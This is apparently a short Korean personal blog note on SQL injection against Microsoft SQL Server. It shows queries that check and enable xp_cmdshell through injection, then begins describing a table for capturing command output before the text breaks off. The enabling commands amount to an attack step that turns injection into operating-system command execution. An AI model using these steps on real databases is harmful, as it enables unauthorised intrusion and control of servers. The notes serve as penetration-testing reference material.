SQL Injection
인젝션 쪽으로 사용하다가 필요한 내용 정리 1. mssql - xp_cmdshell 활성화하기 인젝션이 가능하다는 전제 하에 xp_cmdshell 옵션 값 확인 select name, value from sys.configurations where name='xp_cmdshell' 이후 서브쿼리를 활용하여 아래 쿼리 실행, xp_cmdshell 활성화 EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1 RECONFIGURE; xp_cmdshell 결과를 확인하는 방법을 고민하다가 사용자 테이블을 만들어서 결과를 넣기로 함 테이블은 varchar로 만들면 뭔가 에러가 자꾸 났음 (두번째 인자..